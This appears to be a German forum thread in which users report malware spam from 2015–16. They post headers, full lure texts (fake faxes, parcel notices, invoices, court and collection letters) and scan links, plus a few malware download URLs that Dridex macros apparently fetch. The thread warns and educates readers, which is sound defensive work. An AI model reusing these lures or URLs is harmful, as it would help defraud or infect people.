Received: from adnostic.io ([95.85.51.200]) by mx-ha.gmx.net (mxgmx009) with
ESMTP (Nemesis) ID: [ID filtered]
Received: by adnostic.io (Postfix, from userID: [ID filtered]


New incoming fax document.

Please check your fax document in the attachment to this e-mail.

Sender: Erik Connor
Document name: task-00000282906.doc
Pages scanned: 7
Filesize: 181 Kb
Date: Fri, 27 Nov 2015 xx:xx:xx +0300
Scan duration: 57 seconds
Resolution: 200 DPI

Thanks for using Interfax service!

Content-Type: application/zip; name="task-00000282906.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=task-00000282906.zip

kjz1
18.12.2015, 08:43
Wieder aus dem Osten:

Received: from mproxyhzb1.163.com ([123.58.178.201]) by mx-ha.gmx.net
(mxgmx010) with ESMTP (Nemesis) ID: [ID filtered]
Fri, 18 Dec 2015 xx:xx:xx +0100
Received: from [192.168.0.101] (unknown [93.152.143.113])
by smtp4 (Coremail) with SMTP ID: [ID filtered]
Fri, 18 Dec 2015 xx:xx:xx +0800 (CST)

X-Originating-IP: [93.152.143.113] ---> BG-ONLINEDIRECT (Bulgarien)


Guten Abend.
Schauen Sie und zahlen. Details sind in dem beigefugten Dokument.
Calderone Nives

Der Anhang:


Content-Type: application/zip;
?name="Frachtbrief 999663 am 23.10.2015j.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
?filename="Frachtbrief 999663 am 23.10.2015j.zip"

kjz1
22.01.2016, 14:08
Als Mail-Tracking getarnt:

Received: from [125.18.60.162] (unknown [125.18.60.162])
by xxxxx (Postfix) with ESMTP
for xxxxx; Fri, 22 Jan 2016 xx:xx:xx +0100 (CET)


UKMail Info!
Your parcel has not been delivered to your address January 21, 2016,
because nobody was at home.
Please view the information about your parcel, print it and go to the
post office to receive your package.

Warranties
UKMail expressly disclaims all conditions, guarantees and warranties,
express or implied, in respect of the Service.
Where the law prevents such exclusion and implies conditions and
warranties into this contract,
where legally permissible the liability of UKMail for breach of such
condition,
guarantee or warranty is limited at the option of UKMail to either
supplying the Service again or paying the cost of having the service
supplied again.
If you don't receive a package within 30 working days UKMail will charge
you for it's keeping.
You can find any information about the procedure and conditions of
parcel keeping in the nearest post office.

Best regards,
UKMail

Anhang:


Content-Type: application/vnd.ms-excel; name="988271023-PRCL.xls";
type=Unknown Content-Transfer-Encoding: BASE64

https://virusscan.jotti.org/de-DE/filescanjob/7mdg8cmpif

https://www.virustotal.com/de/file/886adc192957bda32b375503c0d8b3c09f4b77a2609e4ef5952072c79c1ca7a0/analysis/1453467710/

und:


code_page Cyrillic

Die Russenmafia mal wieder.

kjz1
27.01.2016, 13:17
Heute wieder:

Received: from s85.arionservices.com.br (unknown [201.140.212.85])
by xxxxx (Postfix) with ESMTP
for xxxxx; Wed, 27 Jan 2016 xx:xx:xx +0100 (CET)


Hi

Please see attached for tomorrow.

Thanks

Michelle Ludlow

der Anhang:


Content-Disposition: attachment; filename="doc4502094035.doc";
creation-date="Wed, 27 Jan 2016 xx:xx:xx -0200";
modification-date="Wed, 27 Jan 2016 xx:xx:xx -0200"

Dort wird wohl per Makro versucht, einen Download anzustoßen:

http://www.cityofdavidchurch.org / 54t4f4f / 7u65j5hg.exe

Anubis analysiert den Download so:

http://anubis.iseclab.org/?action=result&task_id=188a52e8dc5bdd9e491ea4ca0fbded321&format=html

Ostfriese
27.01.2016, 16:05
Schlug heute in einem meiner Postfächer auf. Die bespammte Adresse wird ausschließlich für verschiedene Bugzilla-Datenbanken verwendet und sonst nirgendwo.

Received: from [80.67.18.102] (helo=mx05.ispgateway.de) by
soong.ispgateway.de with esmtp (Exim 4.68) (envelope-from
<reservierung [at] velotours.de>) ID: [ID filtered]
+0100
Return-path: <reservierung [at] velotours.de>
X-Envelope-To: poor [at] spamvictim.tld
Received: from [201.140.220.38] (helo=201-140-220-38.wifi.twtelecom.com.br)
by mx05.ispgateway.de with esmtp (Exim 4.84) (envelope-from
<reservierung [at] velotours.de>) ID: [ID filtered]
x [at] y.tld; Wed, 27 Jan 2016 xx:xx:xx +0100
From: Velotours Touristik GmbH <reservierung [at] velotours.de>
To: <poor [at] spamvictim.tld>
Subject: Reservierungsliste
Reply-To: <reservierung [at] velotours.de>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="====================54535bvbhwj===="
Disposition-Notification-To: <reservierung [at] velotours.de>
Message-ID: [ID filtered]
Date: Wed, 27 Jan 2016 xx:xx:xx -0300
X-Spam-Checker-Version: SpamAssassin 3.3.1 (2010-03-16) on
spamfilter22.ispgateway.de
X-Spam-Level: ****
X-Spam-Status: No, hits=4.9 required=9999.0 tests=BAYES_05,CMAE_1
autolearn=disabled version=3.3.1
X-Spam-CMAETAG: v=2.1 cv=d+p7yHTE c=1 sm=0 tr=0 p=y78sWQPTHGjUACux8JsA:9
p=4IMCYG3VKRYmd49rGdMA:9 a=LfI1UJOB8+q3xuXUwgsxxQ==:17 a=MKtGQD3n3ToA:10
a=ZZnuYtJkoWoA:10 a=7aQ_Q-yQQ-AA:10 a=IGwxZK66XR4A:10 a=QKZy-jTFrmUA:10
a=7Zwj6sZBwVKJAoWSPKxL6X1jA+E=:19 a=fMZ_E1CIlfQA:10 xcat=Undefined/Undefined
X-Spam-CMAECATEGORY: 0
X-Spam-CMAESUBCATEGORY: 0
X-Spam-CMAESCORE: 100
X-Evolution-Source: 1448952694.2528.21 [at] Ostfriesland



Sehr geehrte Damen und Herren,

anbei finden Sie unsere neue Reservierungsliste.

Ihr VELOTOURS-Team
Im Anhang befand sich noch eine angebliche Reservierungsliste im Word-Format. Ich habe mal darauf verzichtet, mir die Liste anzuschauen.

thomas1611
27.01.2016, 16:18
ich denke mal es wird dich beruhigen, wenn ich dir sage: hier waren es 268 Stück bis jetzt. Auf einem meiner Hostingserver wurden 3159 eingeworfen bzw. versucht einzuwerfen.

Vermutlich ist im Worddokument ein Makroschädling, der dann den Rest nachlädt

truelife
27.01.2016, 16:30
[Themen zusammengefügt]

Das ist wieder mal eine Variante des Trojaners "Dridex", der Bankdaten stehlen will. Dridex ist eine Weiterentwicklung von "Cridex" - und die basierte auf dem bekannten, trojanischen Pferd "ZeuS".

kjz1
28.01.2016, 17:11
Wieder dieselben Ganoven:

Received: from [31.206.95.172] (unknown [31.206.95.172])
by xxxxx (Postfix) with ESMTP
for xxxxx; Thu, 28 Jan 2016 xx:xx:xx +0100 (CET)


Thank you for your order. Your Invoice - 96413 - is attached.

Anhang:


Content-Type: application/msword;
name="96413.DOC"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="96413.DOC"

dort dann der Download:

http://ponpes-alhijrah.sch.ID: [ID filtered]

Anubis meint dazu:

http://anubis.iseclab.org/?action=result&task_id=1da6ef13614d0f554552f136143289d9b&format=html

kjz1
29.01.2016, 20:37
Und wieder von den Kriminellen:

Received: from 94-156-196-138.telecablenet.com (unknown [94.156.196.138])
by xxxxx (Postfix) with ESMTP
for xxxxx; Fri, 29 Jan 2016 xx:xx:xx +0100 (CET)

im Anhang:


Content-Type: appl/text;
name="Fax+49 2232949992120160128232732.doc"
Content-Disposition: attachment;
filename="Fax+49 2232949992120160128232732.doc"
Content-Transfer-Encoding: base64

Malware Download:

http://technix.com.ua / 56gf / g545.exe

Anubis-Analyse:

http://anubis.iseclab.org/?action=result&task_id=1141dc777fc87b224fdafdda77be1ca33&format=html

Mittwoch
30.01.2016, 11:00
Im Spamordner findet sich das hier:



Return-Path: <Kopierer@***>
Received: from 188.183.43.195.cust.ip.kpnqwest.it ([195.43.183.188]) by mx.kundenserver.de (mxeue003) with ESMTP (Nemesis) ID: [ID filtered]
Date: Fri, 29 Jan 2016 xx:xx:xx +0200
From: Kopierer@***
Subject: +49 22329499921
To: ***@***
-------------------
CDC 1725_DCC 2725
[00:c0:ee:7a:7f:51]
-------------------
Die Nachricht trägt den Absender Kopierer [at] meinedomain.tld und trägt als Anhang eine (natürlich virenverseuchte) Word-Datei Fax+49 2232949992120160128232732.doc. Zusammen mit dem Betreff "+49 2232949992" versucht diese Nachricht also den Eindruck zu erwecken, sie käme von meinem Kopierer und enthielte ein Fax.

Die Täter machen sich die typische IT-Struktur vieler Firmen zunutze. Ich kenne diverse Unternehmen, in denen es eine zentrale Kopierstation gibt, die als Drucker, Kopierer, Scanner und eben auch Faxgerät für die ganze Firma dient, entsprechend ins Netzwerk eingebunden ist, und tatsächlich eingehende Faxe per Mail verschickt. Unbedarfte ITler vergeben dafür gerne mal eine Mailadresse nach dem Schema Kopierer [at] firmendomain.tld, und die Ganoven betreiben nun Mimikry.

Schönen Gruß
Mittwoch

kjz1
30.01.2016, 14:20
Ditto hier, wobei es die Adresse kopierer [at] ... in unserer Firma gar nicht gibt. Aber so gut gemacht, dass die IT eine separate Warnung an alle rausgeschickt hat. Die Gefahr besteht, dass da viele drauf reinfallen.

kjz1
08.02.2016, 12:01
Mit Javascript im Anhang, hatte ich auch noch nicht:

Received: from [120.56.61.30] (unknown [120.56.61.30])
by xxxxx (Postfix) with ESMTP
for xxxxx; Mon, 8 Feb 2016 xx:xx:xx +0100 (CET)

Verseuchte Kiste in Indien, die nehmen immer mehr zu...


This E-mail was sent from "RNP00267387AFE7" (MP C3003).

Scan Date: Mon, 08 Feb 2016 xx:xx:xx +0530
Queries to: reception [at] optivet.com
Scanned file from Optivet Referrals Ltd.
Optivet Referrals Ltd. Company Reg. No. 06906314. Registered office:
Calyx House, South Road, Taunton, Somerset. TA1 3DU
Optivet Referrals Ltd. may monitor email traffic data and also the
content of email for the purposes of security and staff training.
This message is private and confidential. If you have received this
message in error, please notify us and remove it from your system.

Anhang:


Content-Type: application/octet-stream
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="7801134264663.js"

mit (noch) geringer Erkennungsquote:

https://virusscan.jotti.org/de-DE/filescanjob/sb3oreupta

https://www.virustotal.com/de/file/6e09805b01e3434c76bfb13d0dc57f5e8548ca0692bb9a3ffb730543ef838db5/analysis/1454927887/

kjz1
10.02.2016, 12:42
Wieder mal eine verseuchte Dreckskiste in Indien:

Received: from [103.46.240.143] (unknown [103.46.240.143])
by xxxxx (Postfix) with ESMTP
for xxxxx; Wed, 10 Feb 2016 xx:xx:xx +0100 (CET)

Anhang:


Content-Type: application/msword
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="New Doc 115.doc"
Content-ID: [ID filtered]

https://virusscan.jotti.org/de-DE/filescanjob/1lp5deav5m

https://www.virustotal.com/de/file/1be4b0d83df28b21b1cdc393b2c52637a483f4700a2af48d89da51df437006a5/analysis/1455104028/

kjz1
11.02.2016, 17:48
Und erneut eine verseuchte Dreckskiste aus Indien:

Received: from host-13118.fivenetwork.com (unknown [183.87.13.18])
by xxxxx (Postfix) with ESMTP
for xxxxx; Thu, 11 Feb 2016 xx:xx:xx +0100 (CET)


Please find attached your invoice.

We are making improvements to our billing systems to help serve you
better and because of that the attached invoice will look different from
your previous ones. You should have already received an email that
outlined the changes, however if you have any questions please contact
accounts [at] sagepay.com or call 0845 111 44 55.

Kind regards

Sage Pay
0845 111 44 55

Anhang:


Content-Type: application/vnd.ms-excel;
name=INV00318132_V0072048_12312014.xls
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=INV00318132_V0072048_12312014.xls

CodePage: Windows Cyrillic

https://virusscan.jotti.org/de-DE/filescanjob/b87p63faad

https://www.virustotal.com/de/file/63bcd7e662bdbdcfcfd457e81aec5954648741f42897a220e275ac750fc49730/analysis/1455202573/

kjz1
12.02.2016, 17:33
Und wieder eine vermaledeite indische Dreckskiste:

Received: from [45.117.221.169] (unknown [45.117.221.169])
by xxxxx (Postfix) with ESMTP
for xxxxx; Fri, 12 Feb 2016 xx:xx:xx +0100 (CET)

---> WAY2AIR NET SOLUTION PVT LTD, India


Good afternoon

Please find attached your receipt, sent as requested.

Kind regards

(See attached file)

Fixed Penalty Office
Driver and Vehicle Standards Agency | The Ellipse, Padley Road, Swansea,
SA1 8AN
Phone: 0300 123 9000

Visit www.gov.uk/dvsa for information about the Driver Vehicle and
Standards Agency.

Anhang:


Content-type: application/vnd.ms-word.document.macroEnabled.12;
name="Fixed Penalty Receipt.docm"
Content-Disposition: attachment; filename="Fixed Penalty Receipt.docm"
Content-transfer-encoding: base64

kjz1
15.02.2016, 15:25
Jetzt kommen die Russkis um die Ecke:

Received: from paymentsolution.biz ([81.177.214.197]) by
mailin57.aul.t-online.de with smtp ID: [ID filtered]


Guten Tag,

Im Anhang dieser Email finden Sie Ihre Rechnung fuer den Monat Februar.

Der offene Betrag ist innerhalb von 10 Tagen zu begleichen.

Sollten Sie die Rechnung nicht bezahlen werden wir unser Inkasso damit
beauftragen.

Mit freundlichen Gruessen
paymentsolution

Anhang:


Content-Type: application/octet-stream;
name="Ihre-Rechnung.exe"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="Ihre-Rechnung.exe"

https://virusscan.jotti.org/de-DE/filescanjob/drvvmxgovw

https://www.virustotal.com/de/file/d690cf453ce06d92650f7b0a58fb6221e3976d6ed225e54b985481ba08d6c15e/analysis/1455545904/

Stachel24
16.02.2016, 10:46
Bei mir auch:
Return-Path: <noreply [at] paymentsolution.biz>Received: from paymentsolution.biz ([87.101.46.25]) by mx-ha.web.de (mxweb001)
with ESMTP (Nemesis) ID: [ID filtered]
<meineadresse [at] web.de>; Tue, 16 Feb 2016 xx:xx:xx +0100
Message-ID: [ID filtered]
Date: Tue, 16 Feb 2016 xx:xx:xx +0100
From: "Paymentsolution.biz" <noreply [at] paymentsolution.biz>
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080421 Thunderbird/2.0.0.14
MIME-Version: 1.0
To: "Paymentsolution" <poor [at] spamvictim.tld>
Subject: Ihre Rechnung Februar


Guten Tag,
Im Anhang dieser Email finden Sie Ihre Rechnung fuer den Monat Februar.
Der offene Betrag ist innerhalb von 10 Tagen zu begleichen.
Falls Sie die Rechnung nicht bezahlen werden wir unser Inkasso beauftragen
das Geld einzutreiben.
Mit freundlichen Gruessen
Paymentsolution

Content-Disposition: attachment;
filename="Ihre-Rechnung.exe"

Jogy4711
08.03.2016, 19:06
Das erste mal mit richtigen pers. daten, und zusätzlich dem Trojaner TR/Injector.804352.1 im Gepäck

From - Tue Mar 08 xx:xx:xx 2016
X-Account-Key: account4
X-UIDL: [UID filtered]
X-Mozilla-Status: 1001
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:
Received: (qmail 4656 invoked from network); 8 Mar 2016 xx:xx:xx -0000
Received: from unknown (HELO procurementmx.com) ([45.55.78.149])
(envelope-sender <poor [at] spamvictim.tld>)
by mail07do.versatel.de (qmail-ldap-1.03) with SMTP
for <poor [at] spamvictim.tld>; 8 Mar 2016 xx:xx:xx -0000
Received: from admin by procurementmx.com with local (Exim 4.82)
(envelope-from <support [at] paypal.de>)
ID: [ID filtered]
for poor [at] spamvictim.tld; Tue, 08 Mar 2016 xx:xx:xx -0500
Date: Tue, 8 Mar 2016 xx:xx:xx +0000
To: Vorname Nachname <poor [at] spamvictim.tld>
From: Rechnungsstelle Pay Online24 GmbH <support [at] paypal.de>
Subject: =?utf-8?Q?Rechnung_f=C3=BCr_Vorname_Nachname_noch_offen:_Nr._123456789?=
Message-ID: [ID filtered]
X-Priority: 3
X-Mailer: Framework::Mail
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="b1_aab4da189b17b1b0e2ef5302a182e96a"
Content-Transfer-Encoding: 8bit
X-VT-Original-To: meiner [at] mailaddy.de

--b1_aab4da189b17b1b0e2ef5302a182e96a
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: 8bit




Sehr geehrte/r mein Vorname Nachname ,

unsere Aufforderung blieb bislang leider ergebnislos. Jetzt geben wir Ihnen damit letztmalig die Chance, den nicht gedeckten Betrag der Firma Pay Online24 GmbH zu begleichen.

Eine vollständige Kostenaufstellung Nummer 123456789, der Sie alle Einzelpositionen entnehmen können, ist beigefügt.

Gespeicherte Daten:

Mein Name
Meine Anschrift
mein Wohnort

Telefon: meine telefonnummer
Email: meine [at] mailaddy

Wir erwarten die gesamte Überweisung bis spätestens 11.03.2016 auf unser Bankkonto.

Aufgrund des andauernden Zahlungsausstands sind Sie gezwungen außerdem, die durch unsere Tätigkeit entstandene Gebühren von 93,89 Euro zu tragen. Bei Rückfragen oder Reklamationen erwarten wir eine Kontaktaufnahme innerhalb von 48 Stunden. Um zusätzliche Kosten auszuschließen, bitten wir Sie den ausstehenden Betrag auf unser Bankkonto zu überweisen.

Falls wir bis zum genannten Termin keine Zahlung bestätigen, sehen wir uns gezwungen Ihre Forderung an ein Gericht abzugeben. Alle damit verbundenen Kosten werden Sie tragen. Berücksichtigt wurden alle Buchungen bis zum 07.03.2016.

Mit freundlichen Grüßen

Rechnungsstelle Niklas von Trimberg
rot von mir geändert

Die Datenherkunft ist mir im Moment nicht klar.

Durch die Telefonnummer verringert sich der Kreis der Verdächtigen allerdings auf unter 10.
Ich vermute einer der großen Onlineshop, oder das bekannte Bezahlfensehen, denn sonst wurde diese Rufnummer nirgendwo angegeben.

kjz1
14.03.2016, 14:49
Mit freudlichen Grüßen von der ukrainisch-russischen Cyber-Mafia:

Received: from flexpayment.de ([212.87.183.231]) by mailin59.aul.t-online.de with smtp ID: [ID filtered]


Guten Tag,

Im Anhang dieser Email finden Sie Ihre Rechnung.

Das Passwort für Ihre Rechnung lautet: 12345

Wir mussten feststellen das Sie die Rechnung immer noch nicht bezahlt haben.

Der offene Betrag ist innerhalb von 5 Tagen zu begleichen.

Wir raten Ihnen die Rechnung sofort zu bezahlen ansonsten leiten wir
dies an
unser Inkasso weiter.

Freudliche Grüsse
flexpayment

Im Anhang:


Content-Type: application/octet-stream;
name="Ihre-Rechnung.rar"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="Ihre-Rechnung.rar"

https://www.virustotal.com/de/file/d7139432703f8866470b362db56011657460bfb524f1727cd3e1bbe104691975/analysis/1457962922/

https://virusscan.jotti.org/de-DE/filescanjob/majeuthuwp

kjz1
22.03.2016, 15:54
Eine andere Variante:

Received: from vs01.aemotion.nl ([94.126.67.119]) by mx-ha.gmx.net (mxgmx009) with ESMTPS (Nemesis) ID: [ID filtered]
Received: (qmail 13401 invoked by UID: [UID filtered]


Notice to Appear,

You have to appear in the Court on the March 28.
Please, prepare all the documents relating to the case and bring them to
Court on the specified date.
Note: The case may be heard by the judge in your absence if you do not come.

The Court Notice is attached to this email.

Regards,
Luis Massey,
Court Secretary.

Im Anhang:


Content-Type: application/zip; name="Notice_to_Appear_00000856995.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=Notice_to_Appear_00000856995.zip

kjz1
23.03.2016, 13:38
Und wieder mal eine verseuchte Büchse in Indien:

Received: from [122.102.24.137] (unknown [122.102.24.137])
by xxxxx (Postfix) with ESMTP
for xxxxx; Wed, 23 Mar 2016 xx:xx:xx +0100 (CET)

IP: 122.102.24.137 ---> kappa.net.in


gesendet von

C. K.

Tel: +49(0)4121/3099 538 - Fax: +49(0)6138/9004 356

Heitmann Metallhandel GmbH
Hansekai 3
50735 Kölln
Telefon: +49(0)4121/3099 538
Telefax: +49(0)6138/9004 356
Registergericht: Kölln
Registernummer: HRB 70555
Geschäftsführer: W. H.

im Anhang:


Content-Type: application/richtext; name=rechn_02267-auftrgb nr013.rtf
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=rechn_02267-auftrgb nr013.rtf

Ist aber (natürlich) ein Word-Dokument mit Makro.

https://virusscan.jotti.org/de-DE/filescanjob/mp68xm2o3b

https://www.virustotal.com/de/file/22f84d92b5f62cf253cecce65ab342190562fa82ade3f57c8dae950cedb71e86/analysis/1458736010/

kjz1
30.03.2016, 11:33
Hier hat man bei Amazon und einem bekannten Händler abgekupfert:

Received: from [207.248.58.42] (unknown [207.248.58.42])
by xxxxx (Postfix) with ESMTP
for xxxxx; Wed, 30 Mar 2016 xx:xx:xx +0200 (CEST)

IP: 207.248.58.42 ---> mmredes-207-248-58-42.multimedios.net


------------- Anfang der Nachricht -------------


Sehr geehrte Kundin, sehr geehrter Kunde,

vielen Dank für Ihren Einkauf im medimops-Shop auf Amazon.
Im Anhang dieser E-Mail erhalten Sie die Rechnung für Ihre Bestellung
302-7941588-3536357.
Wir hoffen Sie bald wieder als Kunde begrüßen zu dürfen.


Herzliche Grüße,

Ihr medimops-Team


Bei Fragen nutzen Sie bitte unser Kontaktformular auf unserer Webseite.
Jetzt neu: Die momox iPhone/AndroID: [ID filtered]
Barcode-Scanner. Deutschlands erster mobiler Direktankauf von Büchern,
CDs, DVDs und Spielen. KOSTENLOS erhältlich im App Store/AndroID: [ID filtered]


Impressum:

momox GmbH
Frankfurter Allee 77
10247 Berlin

Telefon: +49 (0)30 488 288 / 200
E-Mail: bitte nutzen Sie unser Kontaktformular

Geschäftsführer: Christian Wegner und Heiner Kroke (Sprecher)
Registergericht: Amtsgericht Berlin Charlottenburg
Registernummer: HRB 121313
Umsatzsteuer-Identifikationsnummer: DE266608643
Vorsitzender des Aufsichtsrates: Dr. Christoph Braun

Die Mail wurde automatisch generiert. Antworten an diese Mailadresse
können nicht gelesen werden. Nutzen Sie unser Kontaktformular.



------------- Ende der Nachricht -------------

Wichtiger Hinweis: Wenn Sie dieser E-Mail antworten, wird Amazon.de Ihre
E-Mail-Adresse mit einer von Amazon bereitgestellten Adresse ersetzen,
um Ihre Identität zu schützen, und die Nachricht in Ihrem Namen
weiterleiten. Um einen möglichen Betrug zu verhindern, setzt Amazon.de
Filtertechniken ein. Nachrichten, die diesen Filter nicht passieren,
werden nicht weitergeleitet. Amazon.de behält Kopien aller über diesen
Service gesendeten und empfangenen E-Mails, einschließlich der
Nachricht, die Sie hier eingeben. Amazon.de wird diese Kopien
insbesondere zur Klärung von eingereichten A-bis-z-Garantie-Anträgen
heranziehen. Indem Sie diesen Dienst nutzen, erklären Sie sich mit
diesem Vorgehen einverstanden.

im Anhang:


Content-Type: application/x-rar-compressed;
name=Rechnung-674-0892610-2914373.rar
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=Rechnung-674-0892610-2914373.rar
Content-Description: Rechnung-674-0892610-2914373.rar

https://www.virustotal.com/de/file/237f9fe64b1337a3fbdd519df43e16c80ef96d91782daffef7f57fe5dd64c0c5/analysis/1459329899/

https://virusscan.jotti.org/de-DE/filescanjob/5rvip8mjio

ToHo
10.06.2016, 11:00
Hallo,

das scheint was neues zu sein. Auf den ersten Blick gutgemachter Brief in gutem Deutsch (naja, ein paar Fehler sind schon drin, die einer guten Sekretärin nicht passieren sollten) vom Anwalt wegen Zahlungsverzug. Absender angeblich "Rechtsanwalt Pay Online24 AG" bzw. dahinter liegt "support [at] ebay.com". Alle Unterlagen dazu dann im zip-Anhang - der natürlich einen Trojaner enthält, wie mir mein Kaspersky verraten hat:cool:.

Hier der Header:

Return-Path: <support [at] ebay.com>
Received: from mad.madiina.info ([162.144.204.62]) by mx-ha.gmx.net (mxgmx003) with ESMTP (Nemesis) ID: [ID filtered]
Received: from najaxcc by mad.madiina.info with local (Exim 4.87) (envelope-from <poor [at] spamvictim.tld>) ID: [ID filtered]
Date: Thu, 9 Jun 2016 xx:xx:xx -0500
To: ............... <poor [at] spamvictim.tld>
From: Rechtsanwalt Pay Online24 AG <support [at] ebay.com>
Subject: =?utf-8?Q?Automatische_Lastschrift_82913386_konnte_nicht_durchgef=C3=BChr?= =?utf-8?Q?t_werden_10.06.2016?=
Message-ID: [ID filtered]
X-Priority: 3
X-Mailer: Apple Mail
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1_c6c4637a3af4cc9c77746f18228439a8"
Content-Transfer-Encoding: 8bit
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - mad.madiina.info
X-AntiAbuse: Original Domain - gmx.net
X-AntiAbuse: Originator/Caller UID/GID: [UID filtered]
X-AntiAbuse: Sender Address Domain - ebay.com
X-Get-Message-Sender-Via: mad.madiina.info: authenticated_ID: [ID filtered]
X-Authenticated-Sender: mad.madiina.info: najaxcc
X-Source: /usr/bin/php
X-Source-Args: /usr/bin/php /home/najaxcc/public_html/wp-includes/js/tinymce/plugins/directionality/editclass.php
X-Source-Dir: najaxcc.com:/public_html/wp-includes/js/tinymce/plugins/directionality
Envelope-To: <poor [at] spamvictim.tld>
X-GMX-Antispam: 0 (Mail was not recognized as spam); Detail=V3;
X-GMX-Antivirus: 0 (no virus found)
X-UI-Filterresults: notjunk:1;V01:K0:audCwoRZ9QQ=:nh+ZikRckyaLYrTTXmFZKOUd+o

Der Text der Mail:

Sehr geehrte/r .........,

bedauerlicherweise mussten wir feststellen, dass unsere Zahlungsaufforderung NR. 829133867 bis heute ergebnislos blieb. Jetzt geben wir Ihnen hiermit letztmalig die Möglichkeit, den ausstehenden Betrag der Firma Pay Online24 AG zu begleichen.

Aufgrund des andauernden Zahlungsverzug sind Sie gezwungen zuzüglich, die durch unsere Tätigkeit entstandene Kosten von 77,64 Euro zu tragen. Bei Rückfragen oder Unklarheiten erwarten wir eine Kontaktaufnahme innerhalb von zwei Werktagen. Um zusätzliche Mahnkosten auszuschließen, bitten wir Sie den fälligen Betrag auf unser Konto zu überweisen. Berücksichtigt wurden alle Zahlungen bis zum 09.06.2016.

Vertragliche Personalien:

(meine vollständige Adresse)

Telefon: (meine Festnetznummer aus dem Telefonbuch)

Wir erwarten die gesamte Überweisung zuzüglich der Gebühren bis spätestens 15.06.2016 auf unser Bankkonto. Falls wir bis zum genannten Termin keine Überweisung bestätigen, sehen wir uns gezwungen Ihren Fall an ein Gericht abzugeben. Alle damit verbundenen Zusatzkosten werden Sie tragen müssen.

Eine vollständige Kostenaufstellung NR. 829133867, der Sie alle Buchungen entnehmen können, ist beigefügt.

Falls Sie den Rechnungsbetrag bereits vorab an uns überwiesen haben, ist dieses Schreiben nur für Ihre Unterlagen bestimmt. Falls Sie Fragen haben, stehen wir Ihnen telefonisch gerne zur Verfügung.

Mit freundlichen Grüßen

Rechtsanwalt Ole Heinrich


Sieh mal einer an, Betrüger können sogar ein Telefonbuch lesen :p. Ich finde das gut gemacht, da könnten ne Menge Leute drauf reinfallen, obwohl ja eigentlich inzwischen jedem klar sein sollte, das man Anhänge von Unbekannten nie niemals nicht ohne Prüfung öffnet.

Schöne Grüße
ToHo

Mittwoch
10.06.2016, 11:55
das scheint was neues zu sein.
Nö, das ist ein weiteres Beispiel für eine schon seit geraumer Zeit laufende Masche, zu der es hier auch schon ein Thema gibt, an das ich Deinen Beitrag folgerichtig angetackert habe.

Schönen Gruß
Mittwoch

carsten.gentsch
16.06.2016, 15:17
So eben aufgeschlagen auf eine Adressse die nur für free Downloads benutzt wurde.
Wenn mich nicht alles täuscht ist hier Evanzo […] beteidigt... Man ist sich auch nicht einig welcher Diest man den nun sei DHL, UPS was auch immer!!!
Domain wurde ert neu registriert scheinbar versucht man es wieder […]


Received: from mail1.evanzo-server.de (mail1.evanzo-server.de [178.254.27.5])
by mein server weiter leitung(Postfix) with ESMTPS ID: [ID filtered]
for <downloadadresse>; Thu, 16 Jun 2016 xx:xx:xx +0200 (CEST)
Received: from [73.5.252.38] (helo=193.169.52.222)
by mail1.evanzo-server.de with esmtpsa (TLS1.0:DHE_RSA_AES_256_CBC_SHA1:32)
(Exim 4.76)
(envelope-from <Lena [at] 4fische.de>)
ID: [ID filtered]
for poor [at] spamvictim.tld; Thu, 16 Jun 2016 xx:xx:xx +0200
Message-ID: [ID filtered]
Reply-To: "Bestellung" <senddhl.de>
From: "Bestellung" <Lena [at] 4fische.de>
To: <me>


4fische.de und evanzo als versender?
Anhang angebliche Rechnung als Zip. Hervorhebung durch mich ;)


Sehr geehrter Herr,
bei der Zustellung Ihrer Order DE713357744 hat der Paketbote versucht, Sie telefonisch
zu erreichen, leider ohne Beifall. Aus diesem Grund wurde die Bestellung zuruck zur Sortierstelle gebracht.
Wir haben festgestellt, dass im Moment der Paketanmeldung eine falsche Telefonnummer angegeben wurde.
Wir bitten Sie den Lieferschein, den wir an dieses Schreiben angehangt haben, auszudrucken, und sich an die
nachstliegende UPS-Filiale zu wenden.
Mit freundlichen GruBen,
United Parcel Service Deutschland Inc. & Co. OHG
German

Soll ein Trojaner runterladen wird aber schon gut erkannt. https://www.virustotal.com/de/file/50a11b8d02fa54430f83d93481c86027a3fdd80d42ab0eccdd8bfdf4e9493304/analysis/

Goofy
16.06.2016, 19:15
Alle Unterlagen dazu dann im zip-Anhang - der natürlich einen Trojaner enthält, wie mir mein Kaspersky verraten hat:cool:

Möglicherweise sind sich hier immer noch nicht alle über den sicheren Umgang mit solchen Dingen im Klaren. Um das nochmal klarzustellen: es ist hochgefährlich, auf den Anhang zu klicken und dann zu hoffen, dass der Virenscanner anbeißt, falls es ein Virus ist. Denn die Hackermafia setzt jeden Tag neue Varianten von dem Dreckszeugs frei, und die ganz frischen werden dann oft nicht erkannt. Sondern erst nach 1-2 Tagen, nachdem der Virenscanner seine Signaturen upgedatet hat.

Nach Klick auf den Anhang wird dann die Datei sofort ausgeführt, wenn der Virenscanner nichts gefunden hat. Und ab sofort ist dann die Kiste verwurmt, mit allen Konsequenzen wie z.B. Verschlüsselung der Festplatte und Erpressung zur Freischaltung, oder aber Abfangen von Online-Banking-Daten oder sonstigen Passwörtern.

Solche Anhänge in solchen Mails sind immer Schadsoftware, egal ob der Virenscanner was findet oder nicht!

